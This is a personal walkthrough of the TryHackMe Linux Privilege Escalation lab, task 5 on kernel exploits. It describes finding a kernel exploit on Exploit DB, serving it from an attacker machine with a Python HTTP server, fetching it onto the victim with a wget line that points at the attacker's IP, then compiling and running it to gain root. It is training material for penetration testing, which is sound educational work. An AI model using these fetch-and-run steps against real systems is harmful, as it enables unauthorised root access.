Try Hack Me: Linux PrivEsc Complete Steps

Completing the TryHackMe Linux Privilege Escalation labs on the Jr Penetration Tester path has been challenging to me. I thought I needed to write about it. Let's get started!

I will skip some of the informational part and jump straight to task 5.

Task 1: Introduction

Task 2: What is Privilege Escalation?

Task 3: Enumeration

It does not matter how you gain the initial foothold, When you land on your target machine the first thing you want to do is Enumeration.

To get the full enumeration steps, head over to TryHackMe Linux Privilege Escalation labs

Now let's dive into the main reason for this article:

Task 5: Privilege Escalation: Kernel Exploits:

This task expects that we escalate our privilege via kernel exploit.

Steps:

1. Get a foothold into the target system, in this case, we SSH into the target machine from our attack machine with the details provided
2. We are to escalate through kernel exploit, we need to get the kernel of the machine by running the code below:

uname -a

1. Now we have the kernel name, we need to search exploit DB for exploit to use against the victim machine kernel. We are in luck, we found an exploit on exploit DB. In most cases we might have to dig a little more on the internet.

1. Click Download to download the exploit to your attacker machine

1. The next step is to find a way to get the exploit code to the victim machine. I will be doing this with python3 http server.
2. On the attacker's machine, run the code below in the same dir you have the file hosted run on port 8080.

python3 -m http.server 8080

1. Once your server is running on the attacker's machine, on the victim's machine, you will need to get the file with wget. Run the command below on the victim's machine:

wget http://<attacker's_IP: <Port>/<file_name>

If we check the dir with ls I can see the downloaded file in the dir. On the victim's machine.

1. After the download, run the command below to compile the C file on the victim's machine.

gcc <filename.c> -o <name_want_to_call_the_compiled_file> -w

1. Then you need to give writable permission to the compiled file.

If successful, you should see the file name in the dir, then run id to see current user id:

You can see that we have the regular user at the moment:

1. Then run the exploit code:

Now we are root after we run the exploit code:

Conclusion

This is the end of the first part of this series. Watch out for

Tasks 6 - 12.

I hope this helped someone as this lab really challenged me, but it was so much fun and it felt good to complete it. Anyways, I got through it and now, so have you!

It's Michael